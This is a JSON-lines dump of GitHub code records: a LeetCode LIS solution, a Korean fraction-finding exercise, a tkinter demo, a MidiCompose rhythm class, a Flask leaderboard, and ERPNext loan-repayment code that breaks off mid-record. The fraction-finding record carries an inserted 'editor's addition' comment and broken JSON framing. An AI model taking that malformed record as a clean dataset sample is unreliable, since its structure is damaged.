+{"seq_id":"30866008879","text":"class Solution:\n    def lengthOfLIS(self, nums: List[int]) -> int:\n        seq = []\n        for i in nums:\n            pos = bisect_left(seq, i)\n            \n            if pos == len(seq):\n                seq.append(i)\n            else:\n                seq[pos] = i\n        \n        return len(seq)","repo_name":"Maxwell-Yang-2001/maxwell-yang-leetcode","sub_path":"300-longest-increasing-subsequence/300-longest-increasing-subsequence.py","file_name":"300-longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11539606852","text":"x = int(input())\r\nline = 1\r\nlst = []\r\nfor i in range(1,x+1):\r\n    if x > line:\r\n        x = x - i\r\n        line += 1\r\n        lst.append(x)\r\n    else:\r\n        break\r\nif len(lst)%2 ==0:\r\n    a = len(lst) + 2 - x\r\n    b = x\r\n    print(f\"{a}\"+'/'+f'{b}')\r\nelse:\r\n    a = x\r\n    b = len(lst) + 2 - x\r\n    print(f\"{a}\"+'/'+f'{b}')
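\r\n# Worked example (editor's addition): the values are read along zigzag diagonals;\r\n# for x = 14, diagonals 1-4 hold 10 values, so it is the 4th entry on diagonal 5,\r\n# and the program prints 2/4.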
분수찾기/분수찾기.py","file_name":"분수찾기.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41892103496","text":"from tkinter import *\n\nmenu= Tk()\nmenu.title(\"Alterar propriedades\")\nmenu.geometry(\"500x500+10+10\")\nmenu['bg']='white'\n\n#botao\nbtn= Button(menu,text=\"Clique\",background=\"green\") #button(objPai, propriedades)\nbtn.pack()\n#botao + eventos\ndef botao_clique(num):\n soma=num\n print('num1 + num2 = ',soma)\n \nbotao= Button(menu,text=\"Executar\", command=lambda:botao_clique(5)) #lambda passa algum valor para funcao\nbotao.pack()\n\n\nmenu.mainloop()","repo_name":"GeilsoFaria/faculdade","sub_path":"aulas/Python/tkinter/alterar-propriedades+botao.py","file_name":"alterar-propriedades+botao.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"756863086","text":"import random\nfrom typing import Union, Collection, Optional, List, Sequence\nfrom copy import deepcopy\nfrom itertools import chain\n\nimport numpy as np\nfrom icecream import ic\n\nfrom MidiCompose.logic.rhythm.beat import Beat\nfrom MidiCompose.utilities import temp_seed,ctx_random_seed\n\n\nclass MeasureIterator:\n\n def __init__(self, measure):\n self._Measure = measure\n self._index = 0\n self._len_Measure = len(self._Measure)\n\n def __next__(self) -> Beat:\n if self._index < self._len_Measure:\n result = self._Measure.beats[self._index]\n self._index += 1\n return result\n else:\n raise StopIteration\n\n\nclass Measure:\n\n def __init__(self,\n beats: Optional[Union[Collection[Union[int, Beat, Collection[int]]]]] = None,\n verbose: bool = False):\n \"\"\"\n Three options for initialization:\n 1) Supply iterable of Beat object. This is useful if passing Beats with pre-defined time_units.\n 2) Supply a collection of collections of integers, where the number of items represents the number\n of time_units, and the values of the integers represents the respective subdivision of each time_units.\n 3) Combination of the previous two.\n\n Note that passing an integer will automatically instantiate an \"empty\" time_units. 
That is,\n all TimeUnit objects will be set to 0 within that time_units.\n\n :param beats: iterable containing Beat objects, bare integers, or a combination of the two.\n :param verbose: if True, __repr__ gives more info.\n \"\"\"\n\n self.beats: Collection[Beat] = beats # calls setter method\n self.verbose: bool = verbose\n\n\n #### PROPERTIES ####\n\n @property\n def beats(self) -> List[Beat]:\n return self._beats\n\n @beats.setter\n def beats(self, value):\n\n if value is None: # initialize empty measure\n self._beats = []\n else:\n\n value_type_set = set([type(b) for b in value])\n\n beat_set = {Beat}\n int_set = {int}\n col_of_ints_set = {Collection}\n mixed_set = {Beat, int}\n\n # collection of collections of integers\n coll_of_colls = all([issubclass(type(b), Collection) for b in value])\n if coll_of_colls:\n self._beats = [Beat(c) for c in value]\n\n # contains only Beats -- no validation needed\n elif value_type_set.issubset(beat_set):\n self._beats = [v for v in value]\n\n # contains only integers -- validated by Beat constructor\n elif value_type_set.issubset(int_set):\n self._beats = [Beat(a) for a in value]\n\n # contains mixture Beat and int -- validated by Beat constructor\n else:\n _beats = []\n for b in value:\n if type(b) == int:\n _beats.append(Beat(b))\n else:\n _beats.append(b)\n self._beats = _beats\n\n @property\n def n_beats(self):\n return len(self)\n\n @property\n def state(self):\n \"\"\"\n 1-d numeric array containing figure of each time_units in Measure.\n \"\"\"\n beat_states = np.concatenate([b.state for b in self.beats])\n state = np.empty(shape=(beat_states.size + 1,), dtype=np.int8)\n state[0] = -2\n state[1:] = beat_states\n return state\n\n @property\n def active_state(self) -> np.ndarray:\n \"\"\"\n Same as `figure` array but without beat/measure flags.\n \"\"\"\n return np.concatenate([b.active_state for b in self.beats])\n\n @property\n def subdivision_values(self) -> np.ndarray:\n \"\"\"\n Returns a 1d array containing the subdivision of each `Beat` in the `Measure`.\n \"\"\"\n idx_sub_vals = np.where(self.state == -3)[0] + 1\n sub_vals = self.state[idx_sub_vals]\n return sub_vals\n\n @property\n def n_note_on(self) -> int:\n \"\"\"\n The number of \"note_on\" events in the Measure.\n \"\"\"\n return sum([b.n_note_on for b in self.beats])\n\n @property\n def is_active(self):\n if self.n_note_on > 0:\n return True\n else:\n return False\n\n @property\n def flattened(self) -> List[int]:\n _flattened = list(chain(*self))\n return _flattened\n\n #### UTILITY FUNCTIONS ####\n\n # TODO: implement override/reshape checks\n def set_state(self,\n state: [Collection[Collection[int]]],\n override: bool = True,\n reshape: bool = False):\n \"\"\"\n Sets `figure` array as well as `beats` array.\n\n :param override: If False, will raise exception if trying to override a stateful measure.\n :param reshape: If False, will raise exception if `figure` argument would result in \"reshaping\" the measure (ie.\n changing the number of beats, or number of subdivisions in a time_units.)\n \"\"\"\n self.beats = state\n\n def activate_random(self, density: float,\n random_seed: Optional[int] = None,\n beat_idx: Sequence[int] = None):\n\n beats = deepcopy(self.beats)\n\n _beats = []\n with ctx_random_seed(random_seed):\n if beat_idx is None:\n beat_idx = list()\n\n for i,beat in enumerate(beats):\n if i not in beat_idx:\n choices = random.choices(population=[1,0],\n weights=[density,1-density],\n k=len(beat))\n _beat = Beat(choices)\n else:\n _beat = beat\n 
_beats.append(_beat)\n\n        _measure = Measure(_beats)\n        return _measure\n\n    def sustain_all(self, beat_idx: Optional[Collection[int]] = None):\n        \"\"\"\n        Convert all \"note_off\" events to \"sustain\" events.\n        :param beat_idx: If given, only apply to the given beats.\n        \"\"\"\n        if beat_idx is not None:\n            if max(beat_idx) > len(self.beats):\n                msg = f\"`beat_idx` out of range.\"\n                raise IndexError(msg)\n            else:\n                for i in beat_idx:\n                    self.beats[i].sustain_all()\n        else:\n            for b in self.beats:\n                b.sustain_all()\n\n        return self\n\n    def shorten_all(self, beat_idx: Optional[Collection[int]] = None):\n        \"\"\"\n        Convert all \"sustain\" events to \"note_off\" events.\n        :param beat_idx: If given, only apply to the given beats.\n        \"\"\"\n\n        if beat_idx is not None:\n            if max(beat_idx) > len(self.beats):\n                msg = f\"`beat_idx` out of range.\"\n                raise IndexError(msg)\n            else:\n                for i in beat_idx:\n                    self.beats[i].shorten_all()\n        else:\n            for b in self.beats:\n                b.shorten_all()\n\n        return self\n\n    #### GENERATOR FUNCTIONS ####\n\n    def get_complement(self,\n                       adherence: float = 1.0,\n                       random_seed: Optional[int] = None,\n                       beat_idx:Optional[Sequence[int]] = None) -> Beat():\n\n        raise NotImplementedError()\n\n        if adherence > 1 or adherence < 0:\n            msg = \"`adherence` must be a float between 0 and 1.\"\n            raise ValueError(msg)\n\n        if beat_idx is not None:\n            e = \"Implement beat indexing!\"\n            raise NotImplementedError(e)\n\n    #### MAGIC METHODS ####\n\n    def __iter__(self):\n        return MeasureIterator(self)\n\n    def __getitem__(self, item: int) -> Beat:\n        return self.beats[item]\n\n    def __mul__(self,number: int) -> list:\n        return [deepcopy(self) for _ in range(number)]\n\n    def __len__(self):\n        return len(self.beats)\n\n    def __repr__(self):\n        r = \"Measure(\"\n        beat_strs = [str(b.active_state) for b in self.beats]\n        for i,b in enumerate(beat_strs):\n            if i < len(beat_strs) - 1:\n                r += b + \", \"\n            else:\n                r += b + \")\"\n        return r\n\n\n\n","repo_name":"aParthemer/MidiCompose","sub_path":"MidiCompose/logic/rhythm/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":8224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31043282479","text":"from flask import render_template, session, request, flash, redirect\nfrom web.auth import loginrequired\nfrom db import conn\n\n\ndef leaderboard():\n    cur = conn.cursor()\n    cur.execute(\"SELECT username, sum(score) FROM edits GROUP BY username ORDER BY sum(score) DESC LIMIT 25\")\n    users = cur.fetchall()\n    return render_template(\"leaderboard.html\",\n                           thispage='leaderboard',\n                           users=users)\n","repo_name":"tjcsl/wedge","sub_path":"web/views/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38141108409","text":"import frappe\nfrom frappe import _\nfrom frappe.utils import add_days, cint, date_diff, flt, get_datetime, getdate\n\nimport erpnext\nfrom erpnext.accounts.general_ledger import make_gl_entries\nfrom erpnext.controllers.accounts_controller import AccountsController\nfrom erpnext.loan_management.doctype.loan_interest_accrual.loan_interest_accrual import (\n\tget_last_accrual_date,\n\tget_per_day_interest,\n)\nfrom erpnext.loan_management.doctype.loan_security_shortfall.loan_security_shortfall import (\n\tupdate_shortfall_status,\n)\nfrom erpnext.loan_management.doctype.process_loan_interest_accrual.process_loan_interest_accrual import 
(\n\tprocess_loan_interest_accrual_for_demand_loans,\n)\n\n\nclass LoanRepayment(AccountsController):\n\tdef validate(self):\n\t\tamounts = calculate_amounts(self.against_loan, self.posting_date)\n\t\tself.set_missing_values(amounts)\n\t\tself.check_future_entries()\n\t\tself.validate_amount()\n\t\tself.allocate_amounts(amounts)\n\n\tdef before_submit(self):\n\t\tself.book_unaccrued_interest()\n\n\tdef on_submit(self):\n\t\tself.update_paid_amount()\n\t\tself.update_repayment_schedule()\n\t\tself.make_gl_entries()\n\n\tdef on_cancel(self):\n\t\tself.check_future_accruals()\n\t\tself.update_repayment_schedule(cancel=1)\n\t\tself.mark_as_unpaid()\n\t\tself.ignore_linked_doctypes = [\"GL Entry\"]\n\t\tself.make_gl_entries(cancel=1)\n\n\tdef set_missing_values(self, amounts):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\n\t\tif not self.posting_date:\n\t\t\tself.posting_date = get_datetime()\n\n\t\tif not self.cost_center:\n\t\t\tself.cost_center = erpnext.get_default_cost_center(self.company)\n\n\t\tif not self.interest_payable:\n\t\t\tself.interest_payable = flt(amounts[\"interest_amount\"], precision)\n\n\t\tif not self.penalty_amount:\n\t\t\tself.penalty_amount = flt(amounts[\"penalty_amount\"], precision)\n\n\t\tif not self.pending_principal_amount:\n\t\t\tself.pending_principal_amount = flt(amounts[\"pending_principal_amount\"], precision)\n\n\t\tif not self.payable_principal_amount and self.is_term_loan:\n\t\t\tself.payable_principal_amount = flt(amounts[\"payable_principal_amount\"], precision)\n\n\t\tif not self.payable_amount:\n\t\t\tself.payable_amount = flt(amounts[\"payable_amount\"], precision)\n\n\t\tshortfall_amount = flt(\n\t\t\tfrappe.db.get_value(\n\t\t\t\t\"Loan Security Shortfall\", {\"loan\": self.against_loan, \"status\": \"Pending\"}, \"shortfall_amount\"\n\t\t\t)\n\t\t)\n\n\t\tif shortfall_amount:\n\t\t\tself.shortfall_amount = shortfall_amount\n\n\t\tif amounts.get(\"due_date\"):\n\t\t\tself.due_date = amounts.get(\"due_date\")\n\n\tdef check_future_entries(self):\n\t\tfuture_repayment_date = frappe.db.get_value(\n\t\t\t\"Loan Repayment\",\n\t\t\t{\"posting_date\": (\">\", self.posting_date), \"docstatus\": 1, \"against_loan\": self.against_loan},\n\t\t\t\"posting_date\",\n\t\t)\n\n\t\tif future_repayment_date:\n\t\t\tfrappe.throw(\"Repayment already made till date {0}\".format(get_datetime(future_repayment_date)))\n\n\tdef validate_amount(self):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\n\t\tif not self.amount_paid:\n\t\t\tfrappe.throw(_(\"Amount paid cannot be zero\"))\n\n\tdef book_unaccrued_interest(self):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\t\tif flt(self.total_interest_paid, precision) > flt(self.interest_payable, precision):\n\t\t\tif not self.is_term_loan:\n\t\t\t\t# get last loan interest accrual date\n\t\t\t\tlast_accrual_date = get_last_accrual_date(self.against_loan)\n\n\t\t\t\t# get posting date upto which interest has to be accrued\n\t\t\t\tper_day_interest = get_per_day_interest(\n\t\t\t\t\tself.pending_principal_amount, self.rate_of_interest, self.posting_date\n\t\t\t\t)\n\n\t\t\t\tno_of_days = (\n\t\t\t\t\tflt(flt(self.total_interest_paid - self.interest_payable, precision) / per_day_interest, 0)\n\t\t\t\t\t- 1\n\t\t\t\t)\n\n\t\t\t\tposting_date = add_days(last_accrual_date, no_of_days)\n\n\t\t\t\t# book excess interest paid\n\t\t\t\tprocess = process_loan_interest_accrual_for_demand_loans(\n\t\t\t\t\tposting_date=posting_date, 
loan=self.against_loan, accrual_type=\"Repayment\"\n\t\t\t\t)\n\n\t\t\t\t# get loan interest accrual to update paid amount\n\t\t\t\tlia = frappe.db.get_value(\n\t\t\t\t\t\"Loan Interest Accrual\",\n\t\t\t\t\t{\"process_loan_interest_accrual\": process},\n\t\t\t\t\t[\"name\", \"interest_amount\", \"payable_principal_amount\"],\n\t\t\t\t\tas_dict=1,\n\t\t\t\t)\n\n\t\t\t\tif lia:\n\t\t\t\t\tself.append(\n\t\t\t\t\t\t\"repayment_details\",\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"loan_interest_accrual\": lia.name,\n\t\t\t\t\t\t\t\"paid_interest_amount\": flt(self.total_interest_paid - self.interest_payable, precision),\n\t\t\t\t\t\t\t\"paid_principal_amount\": 0.0,\n\t\t\t\t\t\t\t\"accrual_type\": \"Repayment\",\n\t\t\t\t\t\t},\n\t\t\t\t\t)\n\n\tdef update_paid_amount(self):\n\t\tloan = frappe.get_value(\n\t\t\t\"Loan\",\n\t\t\tself.against_loan,\n\t\t\t[\n\t\t\t\t\"total_amount_paid\",\n\t\t\t\t\"total_principal_paid\",\n\t\t\t\t\"status\",\n\t\t\t\t\"is_secured_loan\",\n\t\t\t\t\"total_payment\",\n\t\t\t\t\"loan_amount\",\n\t\t\t\t\"disbursed_amount\",\n\t\t\t\t\"total_interest_payable\",\n\t\t\t\t\"written_off_amount\",\n\t\t\t],\n\t\t\tas_dict=1,\n\t\t)\n\n\t\tloan.update(\n\t\t\t{\n\t\t\t\t\"total_amount_paid\": loan.total_amount_paid + self.amount_paid,\n\t\t\t\t\"total_principal_paid\": loan.total_principal_paid + self.principal_amount_paid,\n\t\t\t}\n\t\t)\n\n\t\tpending_principal_amount = get_pending_principal_amount(loan)\n\t\tif not loan.is_secured_loan and pending_principal_amount <= 0:\n\t\t\tloan.update({\"status\": \"Loan Closure Requested\"})\n\n\t\tfor payment in self.repayment_details:\n\t\t\tfrappe.db.sql(\n\t\t\t\t\"\"\" UPDATE `tabLoan Interest Accrual`\n\t\t\t\tSET paid_principal_amount = `paid_principal_amount` + %s,\n\t\t\t\t\tpaid_interest_amount = `paid_interest_amount` + %s\n\t\t\t\tWHERE name = %s\"\"\",\n\t\t\t\t(\n\t\t\t\t\tflt(payment.paid_principal_amount),\n\t\t\t\t\tflt(payment.paid_interest_amount),\n\t\t\t\t\tpayment.loan_interest_accrual,\n\t\t\t\t),\n\t\t\t)\n\n\t\tfrappe.db.sql(\n\t\t\t\"\"\" UPDATE `tabLoan`\n\t\t\tSET total_amount_paid = %s, total_principal_paid = %s, status = %s\n\t\t\tWHERE name = %s \"\"\",\n\t\t\t(loan.total_amount_paid, loan.total_principal_paid, loan.status, self.against_loan),\n\t\t)\n\n\t\tupdate_shortfall_status(self.against_loan, self.principal_amount_paid)\n\n\tdef mark_as_unpaid(self):\n\t\tloan = frappe.get_value(\n\t\t\t\"Loan\",\n\t\t\tself.against_loan,\n\t\t\t[\n\t\t\t\t\"total_amount_paid\",\n\t\t\t\t\"total_principal_paid\",\n\t\t\t\t\"status\",\n\t\t\t\t\"is_secured_loan\",\n\t\t\t\t\"total_payment\",\n\t\t\t\t\"loan_amount\",\n\t\t\t\t\"disbursed_amount\",\n\t\t\t\t\"total_interest_payable\",\n\t\t\t\t\"written_off_amount\",\n\t\t\t],\n\t\t\tas_dict=1,\n\t\t)\n\n\t\tno_of_repayments = len(self.repayment_details)\n\n\t\tloan.update(\n\t\t\t{\n\t\t\t\t\"total_amount_paid\": loan.total_amount_paid - self.amount_paid,\n\t\t\t\t\"total_principal_paid\": loan.total_principal_paid - self.principal_amount_paid,\n\t\t\t}\n\t\t)\n\n\t\tif loan.status == \"Loan Closure Requested\":\n\t\t\tif loan.disbursed_amount >= loan.loan_amount:\n\t\t\t\tloan[\"status\"] = \"Disbursed\"\n\t\t\telse:\n\t\t\t\tloan[\"status\"] = \"Partially Disbursed\"\n\n\t\tfor payment in self.repayment_details:\n\t\t\tfrappe.db.sql(\n\t\t\t\t\"\"\" UPDATE `tabLoan Interest Accrual`\n\t\t\t\tSET paid_principal_amount = `paid_principal_amount` - %s,\n\t\t\t\t\tpaid_interest_amount = `paid_interest_amount` - %s\n\t\t\t\tWHERE name = 
%s\"\"\",\n\t\t\t\t(payment.paid_principal_amount, payment.paid_interest_amount, payment.loan_interest_accrual),\n\t\t\t)\n\n\t\t\t# Cancel repayment interest accrual\n\t\t\t# checking idx as a preventive measure, repayment accrual will always be the last entry\n\t\t\tif payment.accrual_type == \"Repayment\" and payment.idx == no_of_repayments:\n\t\t\t\tlia_doc = frappe.get_doc(\"Loan Interest Accrual\", payment.loan_interest_accrual)\n\t\t\t\tlia_doc.cancel()\n\n\t\tfrappe.db.sql(\n\t\t\t\"\"\" UPDATE `tabLoan`\n\t\t\tSET total_amount_paid = %s, total_principal_paid = %s, status = %s\n\t\t\tWHERE name = %s \"\"\",\n\t\t\t(loan.total_amount_paid, loan.total_principal_paid, loan.status, self.against_loan),\n\t\t)\n\n\tdef check_future_accruals(self):\n\t\tfuture_accrual_date = frappe.db.get_value(\n\t\t\t\"Loan Interest Accrual\",\n\t\t\t{\"posting_date\": (\">\", self.posting_date), \"docstatus\": 1, \"loan\": self.against_loan},\n\t\t\t\"posting_date\",\n\t\t)\n\n\t\tif future_accrual_date:\n\t\t\tfrappe.throw(\n\t\t\t\t\"Cannot cancel. Interest accruals already processed till {0}\".format(\n\t\t\t\t\tget_datetime(future_accrual_date)\n\t\t\t\t)\n\t\t\t)\n\n\tdef update_repayment_schedule(self, cancel=0):\n\t\tif self.is_term_loan and self.principal_amount_paid > self.payable_principal_amount:\n\t\t\tregenerate_repayment_schedule(self.against_loan, cancel)\n\n\tdef allocate_amounts(self, repayment_details):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\t\tself.set(\"repayment_details\", [])\n\t\tself.principal_amount_paid = 0\n\t\tself.total_penalty_paid = 0\n\t\tinterest_paid = self.amount_paid\n\n\t\tif self.shortfall_amount and self.amount_paid > self.shortfall_amount:\n\t\t\tself.principal_amount_paid = self.shortfall_amount\n\t\telif self.shortfall_amount:\n\t\t\tself.principal_amount_paid = self.amount_paid\n\n\t\tinterest_paid -= self.principal_amount_paid\n\n\t\tif interest_paid > 0:\n\t\t\tif self.penalty_amount and interest_paid > self.penalty_amount:\n\t\t\t\tself.total_penalty_paid = flt(self.penalty_amount, precision)\n\t\t\telif self.penalty_amount:\n\t\t\t\tself.total_penalty_paid = flt(interest_paid, precision)\n\n\t\t\tinterest_paid -= self.total_penalty_paid\n\n\t\tif self.is_term_loan:\n\t\t\tinterest_paid, updated_entries = self.allocate_interest_amount(interest_paid, repayment_details)\n\t\t\tself.allocate_principal_amount_for_term_loans(interest_paid, repayment_details, updated_entries)\n\t\telse:\n\t\t\tinterest_paid, updated_entries = self.allocate_interest_amount(interest_paid, repayment_details)\n\t\t\tself.allocate_excess_payment_for_demand_loans(interest_paid, repayment_details)\n\n\tdef allocate_interest_amount(self, interest_paid, repayment_details):\n\t\tupdated_entries = {}\n\t\tself.total_interest_paid = 0\n\t\tidx = 1\n\n\t\tif interest_paid > 0:\n\t\t\tfor lia, amounts in repayment_details.get(\"pending_accrual_entries\", []).items():\n\t\t\t\tinterest_amount = 0\n\t\t\t\tif amounts[\"interest_amount\"] <= interest_paid:\n\t\t\t\t\tinterest_amount = amounts[\"interest_amount\"]\n\t\t\t\t\tself.total_interest_paid += interest_amount\n\t\t\t\t\tinterest_paid -= interest_amount\n\t\t\t\telif interest_paid:\n\t\t\t\t\tif interest_paid >= amounts[\"interest_amount\"]:\n\t\t\t\t\t\tinterest_amount = amounts[\"interest_amount\"]\n\t\t\t\t\t\tself.total_interest_paid += interest_amount\n\t\t\t\t\t\tinterest_paid = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tinterest_amount = interest_paid\n\t\t\t\t\t\tself.total_interest_paid += 
interest_amount\n\t\t\t\t\t\tinterest_paid = 0\n\n\t\t\t\tif interest_amount:\n\t\t\t\t\tself.append(\n\t\t\t\t\t\t\"repayment_details\",\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"loan_interest_accrual\": lia,\n\t\t\t\t\t\t\t\"paid_interest_amount\": interest_amount,\n\t\t\t\t\t\t\t\"paid_principal_amount\": 0,\n\t\t\t\t\t\t},\n\t\t\t\t\t)\n\t\t\t\t\tupdated_entries[lia] = idx\n\t\t\t\t\tidx += 1\n\n\t\treturn interest_paid, updated_entries\n\n\tdef allocate_principal_amount_for_term_loans(\n\t\tself, interest_paid, repayment_details, updated_entries\n\t):\n\t\tif interest_paid > 0:\n\t\t\tfor lia, amounts in repayment_details.get(\"pending_accrual_entries\", []).items():\n\t\t\t\tpaid_principal = 0\n\t\t\t\tif amounts[\"payable_principal_amount\"] <= interest_paid:\n\t\t\t\t\tpaid_principal = amounts[\"payable_principal_amount\"]\n\t\t\t\t\tself.principal_amount_paid += paid_principal\n\t\t\t\t\tinterest_paid -= paid_principal\n\t\t\t\telif interest_paid:\n\t\t\t\t\tif interest_paid >= amounts[\"payable_principal_amount\"]:\n\t\t\t\t\t\tpaid_principal = amounts[\"payable_principal_amount\"]\n\t\t\t\t\t\tself.principal_amount_paid += paid_principal\n\t\t\t\t\t\tinterest_paid = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tpaid_principal = interest_paid\n\t\t\t\t\t\tself.principal_amount_paid += paid_principal\n\t\t\t\t\t\tinterest_paid = 0\n\n\t\t\t\tif updated_entries.get(lia):\n\t\t\t\t\tidx = updated_entries.get(lia)\n\t\t\t\t\tself.get(\"repayment_details\")[idx - 1].paid_principal_amount += paid_principal\n\t\t\t\telse:\n\t\t\t\t\tself.append(\n\t\t\t\t\t\t\"repayment_details\",\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"loan_interest_accrual\": lia,\n\t\t\t\t\t\t\t\"paid_interest_amount\": 0,\n\t\t\t\t\t\t\t\"paid_principal_amount\": paid_principal,\n\t\t\t\t\t\t},\n\t\t\t\t\t)\n\n\t\tif interest_paid > 0:\n\t\t\tself.principal_amount_paid += interest_paid\n\n\tdef allocate_excess_payment_for_demand_loans(self, interest_paid, repayment_details):\n\t\tif repayment_details[\"unaccrued_interest\"] and interest_paid > 0:\n\t\t\t# no of days for which to accrue interest\n\t\t\t# Interest can only be accrued for an entire day and not partial\n\t\t\tif interest_paid > repayment_details[\"unaccrued_interest\"]:\n\t\t\t\tinterest_paid -= repayment_details[\"unaccrued_interest\"]\n\t\t\t\tself.total_interest_paid += repayment_details[\"unaccrued_interest\"]\n\t\t\telse:\n\t\t\t\t# get no of days for which interest can be paid\n\t\t\t\tper_day_interest = get_per_day_interest(\n\t\t\t\t\tself.pending_principal_amount, self.rate_of_interest, self.posting_date\n\t\t\t\t)\n\n\t\t\t\tno_of_days = cint(interest_paid / per_day_interest)\n\t\t\t\tself.total_interest_paid += no_of_days * per_day_interest\n\t\t\t\tinterest_paid -= no_of_days * per_day_interest\n\n\t\tif interest_paid > 0:\n\t\t\tself.principal_amount_paid += interest_paid\n\n\tdef make_gl_entries(self, cancel=0, adv_adj=0):\n\t\tgle_map = []\n\n\t\tif self.shortfall_amount and self.amount_paid > self.shortfall_amount:\n\t\t\tremarks = _(\"Shortfall Repayment of {0}.
    Repayment against Loan: {1}\").format(\n\t\t\t\tself.shortfall_amount, self.against_loan\n\t\t\t)\n\t\telif self.shortfall_amount:\n\t\t\tremarks = _(\"Shortfall Repayment of {0}\").format(self.shortfall_amount)\n\t\telse:\n\t\t\tremarks = _(\"Repayment against Loan:\") + \" \" + self.against_loan\n\n\t\tif self.repay_from_salary:\n\t\t\tpayment_account = self.payroll_payable_account\n\t\telse:\n\t\t\tpayment_account = self.payment_account\n\n\t\tif self.total_penalty_paid:\n\t\t\tgle_map.append(\n\t\t\t\tself.get_gl_dict(\n\t\t\t\t\t{\n\t\t\t\t\t\t\"account\": self.loan_account,\n\t\t\t\t\t\t\"against\": payment_account,\n\t\t\t\t\t\t\"debit\": self.total_penalty_paid,\n\t\t\t\t\t\t\"debit_in_account_currency\": self.total_penalty_paid,\n\t\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\t\"remarks\": _(\"Penalty against loan:\") + self.against_loan,\n\t\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\t\"party_type\": self.applicant_type,\n\t\t\t\t\t\t\"party\": self.applicant,\n\t\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t\t}\n\t\t\t\t)\n\t\t\t)\n\n\t\t\tgle_map.append(\n\t\t\t\tself.get_gl_dict(\n\t\t\t\t\t{\n\t\t\t\t\t\t\"account\": self.penalty_income_account,\n\t\t\t\t\t\t\"against\": self.loan_account,\n\t\t\t\t\t\t\"credit\": self.total_penalty_paid,\n\t\t\t\t\t\t\"credit_in_account_currency\": self.total_penalty_paid,\n\t\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\t\"remarks\": _(\"Penalty against loan:\") + self.against_loan,\n\t\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t\t}\n\t\t\t\t)\n\t\t\t)\n\n\t\tgle_map.append(\n\t\t\tself.get_gl_dict(\n\t\t\t\t{\n\t\t\t\t\t\"account\": payment_account,\n\t\t\t\t\t\"against\": self.loan_account + \", \" + self.penalty_income_account,\n\t\t\t\t\t\"debit\": self.amount_paid,\n\t\t\t\t\t\"debit_in_account_currency\": self.amount_paid,\n\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\"remarks\": remarks,\n\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t}\n\t\t\t)\n\t\t)\n\n\t\tgle_map.append(\n\t\t\tself.get_gl_dict(\n\t\t\t\t{\n\t\t\t\t\t\"account\": self.loan_account,\n\t\t\t\t\t\"party_type\": self.applicant_type,\n\t\t\t\t\t\"party\": self.applicant,\n\t\t\t\t\t\"against\": payment_account,\n\t\t\t\t\t\"credit\": self.amount_paid,\n\t\t\t\t\t\"credit_in_account_currency\": self.amount_paid,\n\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\"remarks\": remarks,\n\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t}\n\t\t\t)\n\t\t)\n\n\t\tif gle_map:\n\t\t\tmake_gl_entries(gle_map, cancel=cancel, adv_adj=adv_adj, merge_entries=False)\n\n\ndef create_repayment_entry(\n\tloan,\n\tapplicant,\n\tcompany,\n\tposting_date,\n\tloan_type,\n\tpayment_type,\n\tinterest_payable,\n\tpayable_principal_amount,\n\tamount_paid,\n\tpenalty_amount=None,\n\tpayroll_payable_account=None,\n):\n\n\tlr = frappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"Loan Repayment\",\n\t\t\t\"against_loan\": loan,\n\t\t\t\"payment_type\": payment_type,\n\t\t\t\"company\": company,\n\t\t\t\"posting_date\": posting_date,\n\t\t\t\"applicant\": applicant,\n\t\t\t\"penalty_amount\": 
